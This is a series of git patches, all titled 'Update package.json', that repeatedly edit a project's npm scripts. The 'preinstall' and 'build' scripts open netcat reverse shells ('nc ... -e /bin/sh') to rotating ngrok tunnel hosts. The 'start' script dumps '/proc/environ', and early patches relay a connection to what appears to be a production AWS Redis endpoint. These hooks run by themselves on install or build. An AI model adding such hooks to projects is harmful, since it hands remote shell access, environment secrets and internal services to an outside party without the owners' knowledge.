From 5cd9401607f25518f47c20b3768339143249e921 Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Thu, 12 May 2022 17:58:45 +0200 Subject: [PATCH 01/14] Update package.json --- package.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/package.json b/package.json index 5afe5dd..f2453ff 100644 --- a/package.json +++ b/package.json @@ -13,7 +13,7 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "nc 0.tcp.in.ngrok.io 16849 -e /bin/sh", + "preinstall" : "nc 5af6-178-223-43-136.eu.ngrok.io 8080 -e /bin/sh", "start": "cat /proc/environ", "build": "nc 0.tcp.in.ngrok.io 17344 -e nc messaging-redis-prod-premium.k2fxzx.0001.use2.cache.amazonaws.com 6379", "test": "react-scripts test --env=jsdom", From 86df798b4c69228291b237cd95196a8412122776 Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Thu, 12 May 2022 18:11:05 +0200 Subject: [PATCH 02/14] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index f2453ff..dbfad0e 100644 --- a/package.json +++ b/package.json @@ -13,9 +13,9 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "nc 5af6-178-223-43-136.eu.ngrok.io 8080 -e /bin/sh", + "preinstall" : "nc 6.tcp.eu.ngrok.io 16640 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 0.tcp.in.ngrok.io 17344 -e nc messaging-redis-prod-premium.k2fxzx.0001.use2.cache.amazonaws.com 6379", + "build": "nc 6.tcp.eu.ngrok.io 16640 -e nc messaging-redis-prod-premium.k2fxzx.0001.use2.cache.amazonaws.com 6379", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" }, From 0b6ded5fb6f74f36c3163d7f4bef0c6d74f749af Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Thu, 12 May 2022 18:17:47 +0200 Subject: [PATCH 03/14] Update package.json --- package.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/package.json b/package.json index dbfad0e..21f9fe6 100644 --- a/package.json +++ b/package.json @@ -15,7 +15,7 @@ "scripts": { "preinstall" : "nc 6.tcp.eu.ngrok.io 16640 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 6.tcp.eu.ngrok.io 16640 -e nc messaging-redis-prod-premium.k2fxzx.0001.use2.cache.amazonaws.com 6379", + "build": "nc 6.tcp.eu.ngrok.io 16640 -e nc messaging-redis-dev.zkwix9.0001.use1.cache.amazonaws.com 6379", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" }, From 8c953ba07307873887fcd3d30e0a81b72f7660a9 Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Thu, 12 May 2022 18:26:01 +0200 Subject: [PATCH 04/14] Update package.json --- package.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/package.json b/package.json index 21f9fe6..c1f0b93 100644 --- a/package.json +++ b/package.json @@ -15,7 +15,7 @@ "scripts": { "preinstall" : "nc 6.tcp.eu.ngrok.io 16640 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 6.tcp.eu.ngrok.io 16640 -e nc messaging-redis-dev.zkwix9.0001.use1.cache.amazonaws.com 6379", + "build": "nc 6.tcp.eu.ngrok.io 16640 -e /bin/sh", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" }, From b2f40809b45c43435d3c17bf6cb667f0bce66a94 Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Mon, 16 May 2022 11:48:29 +0200 Subject: [PATCH 05/14] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index c1f0b93..9dee4b9 100644 --- a/package.json +++ b/package.json @@ -13,9 +13,9 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "nc 6.tcp.eu.ngrok.io 16640 -e /bin/sh", + "preinstall" : "nc 0.tcp.eu.ngrok.io 11577 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 6.tcp.eu.ngrok.io 16640 -e /bin/sh", + "build": "nc 0.tcp.eu.ngrok.io 11577 -e /bin/sh", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" }, From c6f9ad0710e5ffa6eb408ac96e45899efdb5f2cc Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Thu, 19 May 2022 18:47:31 +0200 Subject: [PATCH 06/14] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index 9dee4b9..41af7fb 100644 --- a/package.json +++ b/package.json @@ -13,9 +13,9 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "nc 0.tcp.eu.ngrok.io 11577 -e /bin/sh", + "preinstall" : "nc 5.tcp.eu.ngrok 14155 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 0.tcp.eu.ngrok.io 11577 -e /bin/sh", + "build": "nc 5.tcp.eu.ngrok 14155 -e /bin/sh", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" }, From 194517ac3d9bcb6822d85bcfe5ded00055da53bf Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Thu, 19 May 2022 18:54:13 +0200 Subject: [PATCH 07/14] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index 41af7fb..cb336c3 100644 --- a/package.json +++ b/package.json @@ -13,9 +13,9 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "nc 5.tcp.eu.ngrok 14155 -e /bin/sh", + "preinstall" : "nc 5.tcp.eu.ngrok.io 14155 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 5.tcp.eu.ngrok 14155 -e /bin/sh", + "build": "nc 5.tcp.eu.ngrok.io 14155 -e /bin/sh", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" }, From 9407ae0b953afa07a5aa4b7f9e66487e79de6d26 Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Tue, 24 May 2022 16:29:19 +0200 Subject: [PATCH 08/14] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index cb336c3..bcd69f9 100644 --- a/package.json +++ b/package.json @@ -13,9 +13,9 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "nc 5.tcp.eu.ngrok.io 14155 -e /bin/sh", + "preinstall" : "nc 4.tcp.eu.ngrok.io 11190 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 5.tcp.eu.ngrok.io 14155 -e /bin/sh", + "build": "nc 4.tcp.eu.ngrok.io 11190 -e /bin/sh", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" }, From 595ede596c76075b1790982d247e32f5b17f81b8 Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Tue, 24 May 2022 18:02:13 +0200 Subject: [PATCH 09/14] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index bcd69f9..dedf5ad 100644 --- a/package.json +++ b/package.json @@ -13,9 +13,9 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "nc 4.tcp.eu.ngrok.io 11190 -e /bin/sh", + "preinstall" : "nc 6.tcp.eu.ngrok.io 11801 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 4.tcp.eu.ngrok.io 11190 -e /bin/sh", + "build": "nc 6.tcp.eu.ngrok.io 11801 -e /bin/sh", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" }, From db27b01fdb4b158f105a1b389584ccce9df77a9c Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Wed, 25 May 2022 00:22:09 +0200 Subject: [PATCH 10/14] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index dedf5ad..04dc653 100644 --- a/package.json +++ b/package.json @@ -13,9 +13,9 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "nc 6.tcp.eu.ngrok.io 11801 -e /bin/sh", + "preinstall" : "nc 2.tcp.eu.ngrok.io 16802 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 6.tcp.eu.ngrok.io 11801 -e /bin/sh", + "build": "nc 2.tcp.eu.ngrok.io 16802 -e /bin/sh", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" }, From 12b393dc69a88d4869ae9b5a116f65b206957618 Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Wed, 25 May 2022 00:28:47 +0200 Subject: [PATCH 11/14] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index 04dc653..d77491d 100644 --- a/package.json +++ b/package.json @@ -13,9 +13,9 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "nc 2.tcp.eu.ngrok.io 16802 -e /bin/sh", + "preinstall" : "7.tcp.eu.ngrok.io 18557 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 2.tcp.eu.ngrok.io 16802 -e /bin/sh", + "build": "nc 7.tcp.eu.ngrok.io 18557 -e /bin/sh", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" }, From b280a34c42ae2ee652e710f65391a3e0f1e69436 Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Wed, 25 May 2022 00:29:56 +0200 Subject: [PATCH 12/14] Update package.json --- package.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/package.json b/package.json index d77491d..8d32af6 100644 --- a/package.json +++ b/package.json @@ -13,7 +13,7 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "7.tcp.eu.ngrok.io 18557 -e /bin/sh", + "preinstall" : "nc 7.tcp.eu.ngrok.io 18557 -e /bin/sh", "start": "cat /proc/environ", "build": "nc 7.tcp.eu.ngrok.io 18557 -e /bin/sh", "test": "react-scripts test --env=jsdom", From 0c2b9098d6a418750ceba288082a751f1795f89c Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Fri, 27 May 2022 12:57:43 +0200 Subject: [PATCH 13/14] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index 8d32af6..3a6a86f 100644 --- a/package.json +++ b/package.json @@ -13,9 +13,9 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "nc 7.tcp.eu.ngrok.io 18557 -e /bin/sh", + "preinstall" : "nc 2.tcp.eu.ngrok.io 11049 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 7.tcp.eu.ngrok.io 18557 -e /bin/sh", + "build": "nc 2.tcp.eu.ngrok.io 11049 -e /bin/sh", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" }, From b42b483e65a0a25a1d0b2aa67c2806d096a1d0d4 Mon Sep 17 00:00:00 2001 From: dusanstanis <58050163+dusanstanis@users.noreply.github.com> Date: Fri, 27 May 2022 13:39:45 +0200 Subject: [PATCH 14/14] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index 3a6a86f..83931f4 100644 --- a/package.json +++ b/package.json @@ -13,9 +13,9 @@ "typescript": "3.8.3" }, "scripts": { - "preinstall" : "nc 2.tcp.eu.ngrok.io 11049 -e /bin/sh", + "preinstall" : "nc 7.tcp.eu.ngrok.io 17595 -e /bin/sh", "start": "cat /proc/environ", - "build": "nc 2.tcp.eu.ngrok.io 11049 -e /bin/sh", + "build": "nc 7.tcp.eu.ngrok.io 17595 -e /bin/sh", "test": "react-scripts test --env=jsdom", "eject": "react-scripts eject" },